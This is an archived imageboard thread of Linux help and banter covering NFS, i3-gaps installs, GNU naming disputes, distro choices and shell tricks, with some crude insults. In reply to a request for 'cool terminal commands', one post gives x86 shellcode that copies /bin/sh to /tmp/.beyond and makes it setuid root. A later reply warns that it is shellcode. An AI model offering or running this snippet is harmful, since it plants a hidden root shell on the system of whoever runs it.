[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y ] [Search | Free Show | Home]

/fglt/ - Friendly GNU/Linux Thread

This is a blue board which means that it's for everybody (Safe For Work content only). If you see any adult content, please report it.

Thread replies: 312
Thread images: 40

File: 1478045594400.jpg (784KB, 3558x2668px) Image search: [Google]
1478045594400.jpg
784KB, 3558x2668px
Previous thread: >>61375511

Welcome to /fglt/ - Friendly GNU/Linux Thread.

Users of all levels are welcome to ask questions about GNU/Linux and share their experiences.

*** Please be civil, notice the "Friendly" in every Friendly GNU/Linux Thread ***

Before asking for help, please check our list of resources.

If you would like to try out GNU/Linux you can do one of the following:
0) Install a GNU/Linux distribution of your choice in a Virtual Machine.
1) Use a live image and to boot directly into the GNU/Linux distribution without installing anything.
2) Dual boot the GNU/Linux distribution of your choice along with Windows or macOS.
3) Go balls deep and replace everything with GNU/Linux.

Resources:
Your friendly neighborhood search engine.

$ man %command%
$ info %command%
$ help %command%
$ %command% -h
$ %command% --help

Don't know what to look for?
$ apropos %something%

Check the Wikis (most troubleshoots work for all distros):
https://wiki.archlinux.org
https://wiki.gentoo.org

/g/'s Wiki on GNU/Linux:
https://wiki.installgentoo.com/index.php/Category:GNU/Linux

>What distro should I choose?
https://wiki.installgentoo.com/index.php/Babbies_First_Linux

>What are some cool programs?
https://wiki.archlinux.org/index.php/list_of_applications
https://directory.fsf.org/wiki/Main_Page

>What are some cool terminal commands?
http://www.commandlinefu.com/
http://bropages.org/

>Where can I learn the command line?
http://mywiki.wooledge.org/BashGuide
http://www.grymoire.com/Unix/

>Where can I learn more about Free Software?
https://www.gnu.org/philosophy/philosophy.html

>How to break out of the botnet?
https://prism-break.org/en/categories/gnu-linux

/t/'s GNU/Linux Games: >>>/t/769497
/t/'s GNU/Linux Videos: >>>/t/713097

/fglt/'s website and copypasta collection:
http://fglt.nl && https://p.teknik.io/wJ9Zy
>>
First for:
musl c
busybox
llvm
clang
>>
File: 1478648128048.jpg (54KB, 329x365px) Image search: [Google]
1478648128048.jpg
54KB, 329x365px
>>61393961
>>
>>61393961
>not tcc
>>
>>61394560

What's wrong with NFS?
>>
>>61393961
>busybox
why not plan9port?
it's more muh unix than memebox.
>>
Can we have a thread without acting like retards? Just for fun.
>>
>>61394762
What's wrong with alternative software?
Does it not conform to your gnu only mind set?
>>
>>61394685
NFS is unencrypted over the wire and has shit security unless you use NFSv4 with a full Kerberos setup. Setting up 9p tunneled over SSH is smarter long run.
>>
>>61394685
If there is a problem with the connection it will lock up whatever process was doing IO on the client :(
>>
>>61395436
You can avoid that with doing a "umount -l" of the mountpoint.
>>
>>61395421
Kinda depends if you are willing to sacrifice speed in favour of encrypting data on your local network.
>>
>>61395449
You should be. There's a reason nobody uses telnet anymore.
>mfw my keyboard tried to autocorrect telnet to talmud
>>
>>61394725
compatibility, availability

>>61395446
How can you unmount when the zombie process still has a handle to it?
>>
>>61395496
That's what the -l flag does. Lazy unmount. It doesn't clean up the handles before disconnecting. You can then kill -9 the zombie.
>>
>>61395486
telnet was used to get a login. nfs is used to share files. SSH is designed for interactive sessions, it is slow when using it for bulk transfers, just look at ssh-hp. Blindly saying "use ssh!" without paying attention to the situation under discussion is a pretty shitty way to go about giving advice.
>>
C-c-could someone please help me install i3-gaps on Debian Stretch?
I already have i3 and I found this script that says it makes a deb package for Jesse or newer:
https://github.com/maestrogerardo/i3-gaps-deb
I downloaded the i3-gaps-deb from the raw link
https://raw.githubusercontent.com/maestrogerardo/i3-gaps-deb/master/i3-gaps-deb
and now have a file named "i3-gaps-deb" in my home directory.
I changed permissions to make it executable (chmod 755 i3-gaps-deb), but I can't run it by typing it's name. How does this work?
>>
>>61395576
sudo dpkg -i /path/to/my.deb
>>
>>61395533
NFS sucks nuts over slow links, especially with directories containing lots of files. Anything less than 100Mbps real throughput (read: most wifi) should be using SSHFS instead. If you have a trusted storage subnet isolated from the WAN and wifi, then yeah, NFS can be useful.

>>61395598
IIRC you can also use apt or aptitude (but not apt-get) to install a local .deb and do dependency handling at the same time.
>>
>>61395598
...but I don't have a deb package?
I did try that with the script's locations and it said:
>dpkg-deb: error: '/home/user/i3-gaps-deb' is not a debian format archive subprocess dpkg-deb --control returned error exit status 2
>Errors were encountered while processing:
>/home/user/i3-gaps-deb

So maybe the questions is, how do I make a deb package? I thought that was the what the script I linked to was made to do.
>>
>>61395657
Oh, you have to type in the path to it, not just its name because it is not in your PATH.
Eg ./i3-gaps-deb if you are in the same directory.
>>
>>61395657
What the fuck kind of retard are you? Did you download a source archive?
>>
Install Source Mage GNU/Linux.
>>
>>61395698
>Did you download a source archive?
It doesn't look like it
https://raw.githubusercontent.com/maestrogerardo/i3-gaps-deb/master/i3-gaps-deb
>>61395696
Thank you, but I am still getting the same error. I don't think the thing I saved was a deb package.
>>
>>61395727
You're a goddamn moron. People told you to execute it with ./i3-gaps-deb from the directory that contains the file and you still managed to fuck it up. Maybe go back to GNOME for now.
>>
>>61395767
Thank you :3
The problem was that I had assumed we were still talking about using dpkg and not running the script itself. This is my first time using Linux so everything is new to me although I suppose it should have been clear to any non-moron no matter how inexperienced since the script clearly says it is for creating and installing a deb package therefore I should have known that he was talking about just straight up running the script when he said to use the path to it.
Thanks again.
>>
What's a good Linux remote desktop software for VPS in 2017?

It's so out of vogue now, the information on the web is mostly out-of-date.

Need both server and client recommendation (if not both provided by the same package).
>>
>>61395846
X forewarding
vnc
>>
>>61395846
I use xpra on my local network, which is like X forwarding but applications don't crash if you disconnect. It uses h264 over ssh by default so reasonable performance over the network. But really, if you are talking to a VPS just use a terminal.
>>
Why are some people against GNU? Is it just the "It's just Linux" thing, or is more behind it?
>GNU is about freedom, what's wrong with freedom?
>>
>>61395846
x2go.
http://wiki.x2go.org
>>
>>61395942
i think its a mix of:
- freedom to turn free software into proprietary software is true freedom (bsd-faggotry)
- people mad about interjections
- shills astroturfing

under the thumb, shilling or being stupid
>>
>>61395942
Brand whores are convinced that "Linux" makes a better brand than "GNU/Linux".
>>
File: usb duck.png (149KB, 1015x680px) Image search: [Google]
usb duck.png
149KB, 1015x680px
What are some cool terminal commands?
>>
>>61395942
I dont believe in the loose 4 commandants,that allow you to follow them when they want to,it like its cool mang.
I dont believe in their false prophet rms.
Every freetard i have ever had an interaction with has been positive and derails in to how they break their moral and ethical code when it is most pleasant for them. Basically freetards have no back bone and would rather not inconvenience them selves to uphold the montra they spew out.
>>
>>61396034
systemd-analyze and systemd-blame

They're cool because systemd
>>
>>61396035
nice word filters
>>
>>61395942
RMS was to friendly and GNU/Linux was a mistake. It makes people think: "Why mention GNU in my Linux system" and doesn't solve the actual problem. People still think Linux is a complete system, think in terms of "Linux box", "Linux commandline" etc and go to find reasons to BTFO interjections. It's just GNU
>>
File: 1473894950492.jpg (96KB, 709x980px) Image search: [Google]
1473894950492.jpg
96KB, 709x980px
>>61396085
>Since Linux is a secondary contribution, would it be false to the facts to call the system simply “GNU”? (#justgnu)
It would not be false to the facts, but it is not the best thing to do. Here are the reasons we call that system version “GNU/Linux” rather than just “GNU”:

It's not exactly GNU—it has a different kernel (that is, Linux). Distinguishing GNU/Linux from GNU is useful.
It would be ungentlemanly to ask people to stop giving any credit to Linus Torvalds. He did write an important component of the system. We want to get credit for launching and sustaining the system's development, but this doesn't mean we should treat Linus the same way those who call the system “Linux” treat us. We strongly disagree with his political views, but we deal with that disagreement honorably and openly, rather than by trying to cut him out of the credit for his contribution to the system.
Since many people know of the system as “Linux”, if we say “GNU” they may simply not recognize we're talking about the same system. If we say “GNU/Linux”, they can make a connection to what they have heard about.
>https://www.gnu.org/gnu/gnu-linux-faq.html
>>
>>61395942
>Why are some people against GNU?
it's 4chan, retard
>>
>>61396034
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
>>
>>61396034
python3 -c $'import math,random,subprocess,time\ns=int(subprocess.check_output(["stty", "size"]).split()[1])\nn=0\nwhile 1:print(" "*int(s/2+s/2*math.sin(n))+"\e[38;5;"+str(random.randint(17,231))+"m*\e[m");time.sleep(.05);n+=.1'

Now in color.
>>
>>61396034
lsort() { 
awk '{ print length(), $0 }' | sort -n | cut -d ' ' -f2- <<< "${@:-$(</dev/stdin)}"
}

Sorts input by line length. Comfy to prettify some lists.

$ cat < foo
aaaaaaaaaaaaaaaa
aaaaaaa
aaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaa
$ lsort < foo
aaaaaaa
aaaaaaaaaaaaaa
aaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
>>
>>61396137
wat
>>
So with Dolphin file browser on Fedora, if i ever move, delete or write a large files etc it will not show like a loading bar, or something that tells you what is moving, deleting, the percentage copied or the amount of MB, kb, or gb copied so far. How can i enable this? I love dolphin file browser but this pisses me off
>>
Holy fuck GNU fags are retarded. It's linux, not GNU/linux. Fucking dumb shit GNU faggots, fucking die.
>>
>>61396750
IKR.
gnu is less then 8% of the Linux environment yet they want 50% ownership.
Nonsense!
>>
>>61396801
Linux is a kernel. Download it here: http://kernel.org/ show how you runin it on its own or even create an "environment".
>>
>>61396262
Dont run that its shellcode
>>
>>61397045
musl c for libc
llvm/busybox for userland
clang for compiler
>>
>>61397045
>show how you runin it on its own
Did you reply to the wrong post?
>>
What distro should I run if I want to experience redhat at home?

Is redhat a server OS not meant to be used locally?
>>
>>61396801
>gnu is less then 8% of the Linux environment yet they want 50% ownership.
Are you reffering to that pie chart that for some reason conveniently counted GNU and GNOME (GNU Object Model Environment) as separate entities to prevent GNU from being a "bigger" entity than the Linux kernel?

Because I think you do you sneaky kike.
>>
>>61397166
I dont use GNOME or its dependencies.My distro does not force de/wm's on me.
>freetard on suicide watch
>>
>>61397165
CentOS is rhel build from rhel sources made available by redhat without the copyrighted content as well as patches tha redhat violates the gpl license with.

Fedora is also the "upstream" version of redhat ie. evey redhat release since i think 5 has been built on previous (older) fedora version.
>>
>>61397183
How does your private installation of a particular system change anything?

>>freetard on suicide watch
This is why you're getting nowhere with such discussion. All of you are unable to provide a compelling arguments to back your opinions. The only thing you can do is regurgitate, insult and project.
>>
>>61397205
So on distros that ship with KDE as default.Gnu is 8% of their distro while kde is a larger amount.
So on distros that shit xfce/lxde as default? Gnu is 8% of their distro while XFCE/lxde is a larger amount.

You havent provided any compelling arguments other then "DA UHH BUT GNOME".
>>
>>61397222
>Gnu is 8% of their distro while XFCE/lxde is a larger amount.
Both XFCE and LXDE are GTK.

Besides, once again reffering to the chart you were reffering. It took in account ENTIRE codebase of the "main" repository of this particular release of Ubuntu they were using as reference. I'm fairly sure on your run of the mill installation whether it's a desktop or a server GNU stuff takes a considerably larger part than "just" 13%.

Your point is as always turned moot because Linux is *JUST* the aforementioned 9% so If GNU with 13% doesn't deserve to be mentioned in the GNU/Linux or Linux/GNU (if for some reason it's preferred) Linux doesn't either.
>>
File: 1492363214829.gif (12KB, 250x242px) Image search: [Google]
1492363214829.gif
12KB, 250x242px
situational report.
My crude reimplementation of redshift's functionality in sct works beatifully.
>>
should i stop smoking?
post ending in 01-09 defines the days left
>>
>>61397989
Stop right now; don't be a tabacco industry cuck.
>>
>>61397989
Don't get trolled by GNUfags. True freedom means smoking taback whenever you want. Enjoy your tabacko.
>>
Why does Linux has the "input lag" feeling compared to windows classic?
>>
>>61397989
checkem && stop now
>>
>>61398092
don't use a compositor
>>
>>61398092
blame torvalds for implementing lag
>>
>>61398107
which *buntu lets me do taht?
>>
>>61398092
Known Linux problem. You can fix it by installing Gentoo.
>>
>>61398113
lubuntu
>>
>>61398092
Some retards may recommend instlling some Ubuntu flavor, but don't fall for it.
>>
>>61398092
Linux behaves like the users using it.
>>
>>61398092
cuz linux is shit, install win10 which is the best operating system
>>
why are people still using i3 when sway exists?
>>
>>61398583
Why are people still using X11 when wayland exists?
>>
>>61398583
I've actually worked on sway, and I can say: it's still got a lot of flaws.
>>
>>61396367
bump
>>
>>61398631
exactly doesn't make any sense
>>
>>61398631
because wayland is beta trash, call me when its finished
>>
>>61395942
shills
>>
If I were Google, I'd go Linux.
>implement some google only features in Linux
>buy driver patents, deliver them at Linux
>create an app store
>etc
google is stupid
>>
>>61398804
That's literally what Google did. See Android.
>>
>>61398816
And ChromeOS.
>>
Has anyone tried Uruk?
>>
I restarted my laptop and a black screen with "welcome to emergency mode" appeared, after trying a few tries it worked. Why that happened? Now I'm afraid to reboot again.
>>
>>61393961
Agreed to all of these except busybox. GNU utils are just so much better for desktop use.
>>
best way to convert ALAC/m4a to FLAC in gnu/linux?
>>
Why are there so many idiots posting idiotic comments whenever something Linux related comes up?
Why do those idiots parrot things they aren't 100% sure they're true? Why do they parrot things they know they have no knowledge of? Do they really think no one will notice their stupidity?
>>
>>61398734

Wayland has reached the 1.0 release. The core protocols are finished.
>>
>>61398113

Every distribution lets you do that.

>>61398135

Idiot.
>>
>>61398908
Reboot, reinstall the os, come on man you just bitch out as soon as something goes wrong? At least here you're given clues in comparison to Windows 10 SOMETHING HAPPENED.
>>
>>61399982
NVidia.
Can't.
>>
>>61399794
Why would you want to convert a lossy format into a lossless format?
>>
>>61396020
>freedom to turn free software into proprietary software is true freedom (bsd-faggotry)
I never understood this. Yes, YOU are free to use non-free software but free software is only free when it's, well, free. If you turn it into something proprietary then it's no longer free. People love to stretch the word to beyond its limits just to validate their use of shitty proprietary apps.
>>
>>61396051
alias systemd-anal='systemd-analyze'
It's funny
>>
>>61400168
lol haha, reposted at reddit linuxmasterrace at this very moment
>>
>>61400634
thank you brother
make sure to credit me so that I get some of that karma too
>>
>>61400663
Include me in your screenshot.
>>
Can anyone recommend something for making raids? I know about mdadm but this will be my first raid and I don't want to fuck something up accidentaly.
Maybe there is something good with a GUI?
>>
i3 or openbox?
>>
>>61400921
No thanks.
>>
>>61400863
RTGM. No GUI needed.
>>
>>61400921

You won't use any. You're just asking to feel cool.
Because if you were in a position to use one of them, you'd know what to expect. More so, you'd know how to look it up online and see what each of those is and what they do and you'd compare it against your needs.
But you won't because you're an idiot poser.
>>
File: 23434234.jpg (33KB, 672x493px) Image search: [Google]
23434234.jpg
33KB, 672x493px
Give me replacement for this and I might switch to Linux.

Also for the music player, it is mandatory to have a short by folder structure option.
>>
>>61400921
i3 is tiling
openbox is not
honestly you should only use them if you are sure you cannot do the things you want on other DEs
I don't think it's worth it fucking around with config files for days just to have basic functionality with minimal resources. I mean if you have at least 2G of RAM you can run every modern DE without issues, even GNOME3 so there's no need to go so low level.
>>
>>61401526

>i3 is tiling
i3 supports a floating and tabbed view.

>honestly you should only use them if you are sure you cannot do the things you want on other DEs
You mean window managers. Your desktop environments have window managers. You don't have to swap out your whole environment to change window managers.

>I don't think it's worth it fucking around with config files for days just to have basic functionality with minimal resources. I mean if you have at least 2G of RAM you can run every modern DE without issues, even GNOME3 so there's no need to go so low level.
You don't have to edit config files for days to have basic functionality. Both of the mentioned window managers have default configuration files.
>>
>>61401467
install gentoo
>>
>>61401467
>notepad++
Literally every text editor
Geany, Sublime, Gedit, Kwrite, fucking Vim

>foobar
Literally every music player
>sort by folder
I believe Amarok and Clementine have this. I don't use that option though.
>>
>sudo iptables -t nat -A POSTROUTING -o wlp3s0 -s 192.168.1.0/24 -j MASQUERADE
iptables v1.4.21: can't initialize iptables table `nat': Table does not exist (do you need to insmod?)
>grep -i iptables /usr/src/linux/.config
927:CONFIG_IP_NF_IPTABLES=y
2930:# iptables trigger is under Netfilter config (LED target)

What could I be doing wrong?
>>
Has anyone tried using systemd user services to start graphical utilities, like a taskbar, wallpaper setter and similar? There is no target which says "window manager is running", so I'd have to make one myself and then make my window manager start it.
Is there a cleaner way?
>>
>>61401591
dont forget the ever-existing show-off-your-config threads that you can use to frankenstein a config together. They seem to exist for most things.
>>
I built the Mesa drivers but WoW still won't open in Wine with the claim that libGL.so can't be found. Locate libGL returns nothing too. Do I need to remove the propietary Nvidia drivers or something?
>>
How long does a Ubuntu install take? Trying to use a USB 2.0 as an install disc, and the Ubuntu logo has been on my screen for almost 40 mins now...
>>
I'm running Manjaro, how can I optimize my system to get everything I can out of it? Can I follow this guide? https://oded.blog/2016/10/30/optimizing-your-linux-distro-ninja-level/

Also, is there some guide for retards for CPU schedulers? Should I install irqbalance?
>>
Don't know if this goes here, but what's the best way to get not-shit syntax highlighting in vim? I'm writing some C++ right now and basically everything is white, with only the most brainless stuff (quoted strings, reserved keywords) having any sort of highlighting.
>>
i'm using ubuntu and hte last 4 days i've noticed my internet is 3-4 times slower than i'd expect

i tried some fixes here and there, don't really work
>>
File: 1037836.jpg (39KB, 640x480px) Image search: [Google]
1037836.jpg
39KB, 640x480px
Can any anons with Ryzen hardware please spoonfeed me on how to fucking get Ubuntu or any other Linux variant to install on a Ryzen machine?

Both of the default iso's from Ubuntu (16LTS and the 17) give "unexpected irq trap at vector 07" warnings when trying to install - have seen some talk that it's the Linux Kernel that's the issue, but since I've always installed via a VM and need to install into hardware, I need some help - ie no idea how to update the Kernel without actually having Linux running.
>>
>>61403560
Did you try Fedora/openSuSE/Arch?
>>
File: Spectacle.TJ7501.png (114KB, 830x567px) Image search: [Google]
Spectacle.TJ7501.png
114KB, 830x567px
My VMs were working fine on openSUSE Tumbleweed but after a few updates, I now get this.

Does anyone know anything about this problem?
>>
File: 1497438172200.jpg (61KB, 463x438px) Image search: [Google]
1497438172200.jpg
61KB, 463x438px
Is there a DE out there, that easily lets you disable mouse acceleration from the settings menu?

I have done it with the command line in the past, but then after a while some lib got updated (i think) which broke things again.
Such a basic feature and yet nowhere to be found.
>>
>>61403975
kde

damn this general gets dumber and dumber every day
>>
>>61403975
LXDE
>>
>>61403998
>>61404008
thanks
>>
What are the best tools to monitor CPU/GPU performance on linux distros? I have an Intel CPU/AMD GPU and I'm trying to see how to fix chromium scrolling slowing down at really random times. Override software rendering list is enabled so that isn't the issue.
>>
>>61403679

Are you running it on your local computer and not remotely via ssh or something?
>>
>>61403975

Mouse acceleration is not environment specific and choosing an environment based on that is retarded.
>>
>>61403603
Trying Fedora; I'm now getting to the install screen however Fedora is giving me issues - I have a 1TB NVME SSD and I allocated 700GB for a Windows OS, and left the remaining 200GB free, but Fedora won't recognize it as actually free...
>>
File: apollo_dot_rip.jpg (87KB, 953x960px) Image search: [Google]
apollo_dot_rip.jpg
87KB, 953x960px
>>61404384
>>61403603
Upon banging my head on my keyboard with Google Search open, the issue appears to be that I setup my SSD as MBR instead GPT, and that Fedora requires 3 or so primary partitions which exceeds the limit of 4 due to Win7 already being on the disk.

I have my old SSD that I was going to put into my laptop, but would it be better to wipe it and use it for Fedora? Or is there a sensible way to get around the MBR issue?
>>
Anyone else have a distro they just keep going back to? For me it's Gentoo. I've tried to move away from it many times but I always hit a snag that sends me back.
>>
>>61404803
for me it's Ubuntu. Ubuntu with i3 please don't bully. Was going to install Arch but I thought it will have worse battery life than Ubuntu.
>>
>>61404803
For a while it has been Xubuntu, but these days I don't appreciate XFCE anymore, I got used to modern desktops.
>>
>>61404803
Gentoo was my go to for 8yrs. My latest attempt to escape has been NixOS and so far it's looking good. I really don't think I'll need to go back.
>>
>>61404803

>going back to
No, because a sane person realizes what makes up a distribution quickly and stays with the one that suits them the best.
>>
I'm on debian stretch, will switching to devuan completely break my system?
>>
>>61405296
It shouldn't, I think at most you'll have to re-configure all of the services that depend on lennartd, but I would make a clean install just in case.
>>
File: file.png (31KB, 128x128px) Image search: [Google]
file.png
31KB, 128x128px
Linux Mint KDE or Kubuntu?
>>
>>61405424
gentoo with tmux
>>
>>61405486
>gentoo
I suck too much for that
>>
>>61405486
>tmux
GNU screen
>>
>>61404803
Slackware is the only distro that manages to be simple, easy to use, and leaves plenty of room for configuration. I think I'll reinstall it today.
>>
>>61403193
Anyone? I'd go to /sqt/ but if /fglt/ can't help me I doubt I would find an answer there
>>
>>61404786
Use custom partitioning. Really all you need is root and swap.
>>
Suckless is the chemo curing the cancer. Everything they do is very well written with little to no dependencies.
>>
>>61405988
t. suckless dev

But I agree. Once you get over the "config is in the header just recompile" it's all great shit.
>>
>>61406006
Suckless just needs to fix their surf browser. They absolutely hate webkit yet still use it.
>>
>>61405424
I'm using Neon User Edition, and I've heard that OpenSUSE is pretty damn good.
>>
>>61406082
Webkit and Blink (Chrome) are about the only game in town for embeddable browser engines until Servo is ready, or that /g/ browser by some miracle.
>>
>>61393906
That is the true statue of liberty!
>>
File: fake_caps.jpg (68KB, 800x514px) Image search: [Google]
fake_caps.jpg
68KB, 800x514px
>>61393906
how come
ls *.pdf

gives me
ls: invalid option -- '0'
Try 'ls --help' for more information.

but the command
ls ~/Downloads/*.pdf

works?
>>
>>61406579
>or that /g/ browser
fat chance, no idea why /g/ doesn't collaborate on something simpler.
>>
>>61406993
* is a wildcard, it can mean everything including another flags, that's why it prints error code.

ls ./*.pdf

./ points to the current directory you're in.
>>
>>61406268
I tried both and OpenSUSE (on tumbleweed, even) is far more stable for me. I had a fuckton of problems with Neon, along with tearing.
>>
File: debian.png (81KB, 1028x1270px) Image search: [Google]
debian.png
81KB, 1028x1270px
I'm thinking of switching from Fedora to Debian on my desktop, but I'm kinda worried about how outdated the packages might become in the coming months.

I prefer Fedora to Ubuntu, because it's more focused on delivering a polished Desktop experience. I want to move away from Fedora because their focus is sadly on Gnome and the other DEs suck in comparison. That, and too many things are only available as .debs and getting shit to work on Fedora can be a pain and cost quite a bit of time.

So, advice? When are testing/unstable going to come out and how much do they lag behind rolling releases?
>>
>>61401427
i3 is pretty useful and easy to use on my laptop.
>>
>>61407220
>I prefer Fedora to Ubuntu, because it's more focused on delivering a polished Desktop experience.
the fuck? more like the opposite
>>
>>61407220
Add the backports repo for newer versions of programming languages and the kernel. Firefox ESR gets updates/upgrades from Debian-main. Chrome and Pale Moon both have repos for Stable.
>>
File: 1499310433216.jpg (188KB, 1600x1200px) Image search: [Google]
1499310433216.jpg
188KB, 1600x1200px
>>61407220
Testing/unstable are already out.
Anybody running Stretch atm can easily run Buster by changing a few lines in their sources.list.
Testing (currently "Buster" or Debian 10) will probably suit you and your desktop well. Stretch is extremely stable, but stable releases are typically found running on servers or on older machines.
Unstable is a fucking headache. Consider the fact that the unstable release is always codenamed "Sid," a reference to the psychotic kid in Toy Story who brutally mutilates and breaks toys. That being said, you can except some chaos from both testing and unstable. If you want things to just werk, stick with Stretch.
>>
>>61405987
Not even that. You can use a swap file, no need to make a dedicated partition.
>>
>>61407220
go with devuan
>>
>>61393906
kek
>>
>>61401467
>sort by folder structure

This nigga gets it.

Well, you could use Clementine for that. Problem is it has a horrid GUI. DeadBeeF has some sort of plugin for that but I never got that thing to work.
>>
>>61401467
use wine. not that hard
>>
>>61407668
Ubuntu is focused on sucking amazon off, snaps, kubernetes, ubuntu core, whatever the fuck tickles their fancy. Fedora at least tries to focus on the desktop with selinux, wayland, and working upgrades between releases. In my opinion.
>>
>>61408114
um what? fedoras main purpose is to be used for rhel which is for servers.
>>
>>61407849
Thanks, anon, that's helpful.
>>
>>61408156
Um, no, not really. Not at all, actually. Red Hat uses Fedora to test some stuff, sure, but overall Fedora is aiming to be a streamlined desktop experience. I actually like it apart from the shortcomings I've mentioned, it's a vast improvement compared to Ubuntu.
>>
>>61408089
Most mpd clients can sort by folder structure as can cmus. It's really a very basic feature.

>>61401467
mpd and a good client (I recommend Cantata or ncmpcpp) for music. For text editing, scite uses the same Scintilla backend as Notepad++, but most serious users gravitate to Vim or Emacs eventually. Vim and Emacs have essentially a vertical learning curve for basic editing and navigation, but the payoff is worth it. Vim is less likely to give you RSI.
>>
>>61408279
Yeah, but I was thinking maybe he wanted something with a GUI
>>
>>61408342
GVim exists, and Emacs in Gtk mode has some clickybuttans.
>>
Anyone know a good distro that plays nice with Apple hardware?

Looking to run Linux by itself. The machine in question is a Macbook circa 2008 - 4gb ram, Core Duo.
>>
>>61408592
All Macs ever made suck with every version of Linux to some degree. Get a distribution like Ubuntu that will bundle Broadcom drivers.
>>
>>61408592
install gentoo
>>
>>61408592
>Looking to run Linux by itself
Good luck with that.
>>
File: 1500077731740.jpg (229KB, 872x720px) Image search: [Google]
1500077731740.jpg
229KB, 872x720px
>>61405510
>Screen
What are you a faggot?
>>
File: 1489141118932.jpg (11KB, 300x200px) Image search: [Google]
1489141118932.jpg
11KB, 300x200px
>>61408592
linus runs fedora on his mac
>>
>>61404346
Local
>>
File: 1480861343961.jpg (44KB, 300x414px) Image search: [Google]
1480861343961.jpg
44KB, 300x414px
>>61408735
Friendly thread.
>>
bash vs zsh
>>
Is virtualbox supposed to not work on 4.12?
>>
>>61407220
>about how outdated the packages might become in the coming months.
It's actually quite irrelevant once you start using it.
Debian stable usually has a maintained repository called "backports" for newer versions of software that introduce some critical new feature and software that didn't manage to get into stable in time. Not everything is there of course, but it's always an option.

Forget about testing/unstable.
You're not getting any benefit from using debian testing/unstable that you wouldn't get from other distributions like Ubanto or Fedora you're already using. Debian revolves around the stable branch and it aims to be rock solid and more importantly easily maintainable (throughout the lifespan of a stable branch you won't get a package update that breaks shit). After months or even years of distrohopping it becomes quite a relief to not be forced to be a system user and a system maintainer at the same time.

You can always build your own packages.
And if it's something you're not planning to distribute to others and you just want a compiled binary contained within a .deb file so you can manage it with apt/apt-get there's always a piece of software called "checkinstall" which pretty much does "make install" and then wraps it in a .deb archive. It's useful.

I would recommend devuan which I'm using but since you're already concerned about muh magic package version numbers I guess it would not be a solid recommendation. Debian 9 is still quite fresh.
>>
>>61409175
lol
>>
>>61408944
bash.
>>
>>61408944
fish
>>
>>61408089
Trying Amarok at the moment, seems pretty good, will try Clementine as well.

>>61408279
Suggestion noted, I'm using sublime right now, but I'll migrate to Vim in the future if it is that good.

I'm barely getting my feet into web developement and linux, so I'd rather invest my time first with more simple to aproach software.
>>
can I run Android apps on Linux?
>>
Ubuntu babby here. Does Debian have anything like Ubuntu's ppa? I couldn't find PPSSPP in Debian's repo but with Ubuntu I can just add the PPSSPP ppa which means that I don't have to compile the thing.
>>
>>61409760
Android programs already run on Linux (Linux is a kernel). However, there are some emulators (containers) for GNU out there like archon, anbox etc.
>>
>>61408112

>using wine for a text editor and music player
Just go back to Windows you pretentious idiots.
>>
>>61409760
https://www.linux.com/learn/installing-android-apps-linux-archon
>>
alias installazy='yaourt -S --noconfirm'
>>
File: 1483446146707.jpg (15KB, 240x215px) Image search: [Google]
1483446146707.jpg
15KB, 240x215px
>>61409887
>If you haven’t already installed Chrome, let’s walk through that quick process.
>give this a try and see how well your favorite mobile apps perform on the Linux desktop
>>
File: 1482691555428.jpg (85KB, 843x576px) Image search: [Google]
1482691555428.jpg
85KB, 843x576px
My pacman cache dir is ~ 10GB in size. is it safe to just delete them all?
>>
>>61409844
>>61409887

thanks
>>
>>61410004
Using arch isn't safe by itself. yolo
>>
>>61410022

Epic meme, retard.

>>61410004

Read your package manager's man page or just the output of --help.
>>
>>61408944
zsh
>>
File: 1500235386246.png (254KB, 679x693px) Image search: [Google]
1500235386246.png
254KB, 679x693px
>>61393906
Fuck richard stallman
>>
>>61410669
No. Richard Stallman fucks you.
>>
File: 1470787518754.jpg (392KB, 1920x1200px) Image search: [Google]
1470787518754.jpg
392KB, 1920x1200px
What's your favorite DE?
>>
File: 1488215536110.jpg (4MB, 4096x2301px) Image search: [Google]
1488215536110.jpg
4MB, 4096x2301px
>>
Should I use a rc kernel?
>>
File: o-GRACE-KELLY-570[1].jpg (71KB, 570x708px) Image search: [Google]
o-GRACE-KELLY-570[1].jpg
71KB, 570x708px
So I was ricing and getting things all nice and pretty, right? Then I realized that i3 can't fucking list inactive workspaces so now I need to start all over with bspwm and some piece of shit bar, probably lemonbar, because I don't know what is initiating i3 and all my other shit (ibus) when I run startx since I never installed a display manager and don't have ~/.xprofile or ~/.xinitrc or whatever.
>>
>>61411772
>I don't know what is initiating i3 and all my other shit (ibus) when I run startx
You know it is just a shell script, right? On my system (debian) startx runs /etc/X11/Xsession which souces everything in /etc/X11/Xsession.d/. The STARTUP variable is set, and edited, by various heuristics in those files and executed in the last one. For me it runs x-window-manager as defined in 50x11-common_determine-startup. But not before prefixing it with some xdg and ssh-agent related session management madness in later files.
>>
So I'm trying to get qutebrowser from git and it's giving me an error about pyqt5.
Collecting PyQt5==5.9 (from -r /home/[username]/qutebrowser/misc/requirements/requirements-pyqt.txt (line 3))
Could not find a version that satisfies the requirement PyQt5==5.9 (from -r /home/[username]/qutebrowser/misc/requirements/requirements-pyqt.txt (line 3)) (from versions: )
No matching distribution found for PyQt5==5.9 (from -r /home/[username]/qutebrowser/misc/requirements/requirements-pyqt.txt (line 3))
